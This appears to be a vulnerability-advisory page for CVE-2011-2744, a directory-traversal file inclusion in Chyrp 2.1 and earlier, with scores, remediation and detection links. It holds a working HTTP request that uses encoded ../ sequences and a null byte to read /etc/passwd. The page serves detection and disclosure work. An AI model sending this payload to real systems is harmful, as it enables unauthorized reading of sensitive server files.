🔙 목록으로 돌아가기

CVE-2011-2744: Chyrp 2.x - Local File Inclusion

TitleChyrp 2.x - Local File Inclusion
Authordaffainfo
SeverityMedium
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, or complete compromise of the affected system.
RemediationUpgrade Chyrp to the latest version or apply the necessary patches provided by the vendor.
CVSS Score6.8
EPSS Score0.05641
CVE IDCVE-2011-2744
CWE IDCWE-22
Tags cve cve2011 lfi chyrp edb vuln

🔍 Vulnerability Description

A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.

🌐 HTTP Request

GET /?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.10
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2011/CVE-2011-2744.yaml

🦈 Packet Capture: ⬇️ Download cve-2011-2744.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A